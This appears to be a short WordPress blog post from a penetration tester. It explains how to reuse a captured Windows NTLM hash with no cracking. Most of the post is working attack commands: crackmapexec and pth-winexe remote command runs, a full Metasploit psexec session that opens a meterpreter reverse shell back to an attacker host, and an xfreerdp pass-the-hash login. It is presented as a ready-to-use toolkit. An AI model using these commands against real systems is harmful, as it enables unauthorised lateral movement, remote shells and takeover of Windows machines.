Pass The Hash for Command Line, MSF, and RDP

This is another one of those quick-hits that often comes in handy… you’ve captured a hash (maybe via mimikatz, through a Metasploit module such as post/windows/gather/hashdump, etc), and you need to want to directly use that hash rather than cracking it.  How do you do that?

Let’s assume that the hash you captured was:

Administrator:500:abc123abc123abc123abc123abc123ab:987zyx987zyx987zyx987zyx987zyx98:::

To use this against a machine located at 10.20.30.40 from 10.30.50.70, in the domain “fakeDom” you could use each of the following techniques.

Command Line (CrackMapExec Version)

Note: If you need help installing CME just check out this post for instructions.

crackmapexec 10.20.30.40 -u Administrator -d fakeDom -H
abc123abc123abc123abc123abc123ab 987zyx987zyx987zyx987zyx987zyx98 -x {COMMAND}

Command Line (pth-winexe Version)

pth-winexe -U fakeDom/Administrator%abc123abc123abc123abc123abc123ab:987zyx987zyx987zyx987zyx987zyx98 //10.20.30.40 {COMMAND}

PSExec (via Metasploit)

This one uses the PSExec module from Metasploit, so fire up the console first:

msfconsole

Then use the PSExec module:

msf > use exploit/windows/smb/psexec

Set the options and exploit:

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set RHOST 10.20.30.40
RHOST => 10.20.30.40
msf exploit(psexec) > set LHOST 10.30.50.70
LHOST => 10.30.50.70
msf exploit(psexec) > set LPORT 31337
LPORT => 31337
set SMBPass abc123abc123abc123abc123abc123ab:987zyx987zyx987zyx987zyx987zyx98
SMBPass => abc123abc123abc123abc123abc123ab:987zyx987zyx987zyx987zyx987zyx98
exploit

Then wait for the reverse shell.  Of course, you can use plenty of other payloads, but I just used the standard reverse meterpreter for demonstration purposes.

RDP

This one uses the freerdp-x11 package, which includes a PTH flag option.  If it’s not already installed (which varies based on when you got your Kali distribution and whether or not you’ve done a dist-upgrade lately) then just install it like this:

apt-get install freerdp-x11

And then to directly RDP into the system just use this command:

xfreerdp /u:Administrator /d:fakeDom /pth:abc123abc123abc123abc123abc123ab /v:10.20.30.40

Good hunting!

Comments are closed.

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: